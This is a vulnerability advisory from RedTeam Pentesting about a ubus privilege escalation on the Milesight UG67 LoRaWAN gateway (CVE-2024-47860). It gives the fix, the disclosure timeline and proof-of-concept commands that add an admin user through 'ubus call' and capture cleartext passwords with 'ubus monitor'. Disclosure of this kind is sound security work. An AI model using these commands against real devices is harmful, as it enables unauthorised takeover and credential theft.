Advisory: Milesight UG67: UBUS Allows for Privilege Escalation


Attackers who which can execute commands on a Milesight UG67 LoRaWAN Gateway can
gain full root access by using ubus features.


### Details

- Product: Milesight UG67 Outdoor LoRaWAN Gateway
- Affected Versions: 60.0.0.42-r5, likely others
- Fixed Versions: 60.0.0.44
- Vulnerability Type: Local Privilege Escalation
- Security Risk: low
- Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67
- Vendor Status: fixed version released
- Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-004
- Advisory Status: published
- CVE: CVE-2024-47860
- CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47860


### Introduction

The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for
outdoor deployments.


### More Details

Attackers who are able to execute commands with the privileges of any
user account on a Milesight UG67 LoRaWAN Gateway can use the `ubus`
inter-process-communication system to read `ubus` messages of other processes and call `ubus` functions.
This allows for example to create new users with administrative privileges or to
obtain cleartext credentials of other users, including administrative accounts,
who authenticate to the device.


### Proof of Concept

Any user account with the ability to execute arbitrary commands on the
gateway (see
[rt-sa-2024-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003)
on how to gain command execution via PostgreSQL) is able to use the
`ubus` command-line client to issue commands. In the following, a user
`redteam` will be created via `ubus call`:

```
$ ubus call yruo_usermanagement add \
"{ \
    'base': 'user_list', \
    'index': 'user_listlvf0lwqg', \
    'value': { \
        'username': 'redteam', \
        'old_username': 'username', \
        'password': 'secretpassword', \
        'permission': '1' \
    }, \
    'type': 'user_list', \
    'ysusername': 'admin', \
    'ysrole': 4 \
}"
```

Afterwards it is possible to log in into the web interface with almost
full access. This allows to read and change all configured values,
including all secrets.


To monitor traffic received by the ubusd server, the `ubus monitor`
command can be used:

```
$ ubus monitor
```

This includes the messages generated when a user authenticates to the
system via the web interface:

```
-> bd896693 #00000000  status: {"status":0}
[...]
<- bd896693 #9a5c2c32  invoke: {"objid": -1705235406, "method": "login",
                                "data": {"username": "admin",
                                         "password": "xxxxxxxxxxxxxxxxxxxxxx",
                                         "ubus_rpc_session": "000000[...]00",
                                         "timeout": 1800, "ip": "127.0.0.1"}}
```

Since the login details are provided by ubus in the clear, this allows
attackers to collect the credentials of all users who authenticate to
the gateway while the ubus traffic is monitored.

### Workaround and Fix

The ubus ACL should be modified to restrict access to ubus by
low-privileged users accounts by default.

### Security Risk

Attackers who are able to execute arbitrary commands on a Milesight UG67
LoRaWAN Gateway, can collect valid user credentials by monitoring ubus
traffic or create new users with administrative privileges. This allows
attackers to completely take over the device and extract all configured
secrets.

Since all accounts, except the root account, only have a limited shell
configured, which does not allow to execute arbitrary commands, this
attack requires another vulnerability (like
[rt-sa-2024-003](https://www.redteam-pentesting.de/advisories/rt-sa-2024-003))
to gain shell access. In combination these vulnerabilities pose a high
risk.



### Timeline

- 2024-04-25 Vulnerability identified
- 2024-04-29 Customer approved disclosure to vendor
- 2024-05-14 Vendor notified
- 2024-06-28 asked Vendor for update
- 2024-07-03 Vendor will provide Update until end of July
- 2024-07-24 asked Vendor for update
- 2024-07-30 Vendor stated: Work in Progress
- 2024-08-09 Vendor stated: Fix expected Q3/24
- 2024-09-24 CVE ID requested
- 2024-09-24 asked Vendor for update
- 2024-09-24 Vendor stated: Fix in 60.0.0.44
- 2024-10-04 CVE ID assigned
- 2024-10-07 asked Vendor for update
- 2024-10-08 Vendor stated: Fix will be available mid-October
- 2024-10-18 asked Vendor for update
- 2024-10-21 Vendor stated: Fix will be available mid-November
- 2024-11-04 Vendor released fixed version for testing
- 2024-11-05 Vendor released fixed version
- 2024-12-10 Customer approved public release of vulnerabiltiy details
- 2024-12-10 Advisory released


### RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
<https://www.redteam-pentesting.de/>

### Working at RedTeam Pentesting

RedTeam Pentesting is looking for penetration testers to join our team
in Aachen, Germany. If you are interested please visit:
<https://jobs.redteam-pentesting.de/>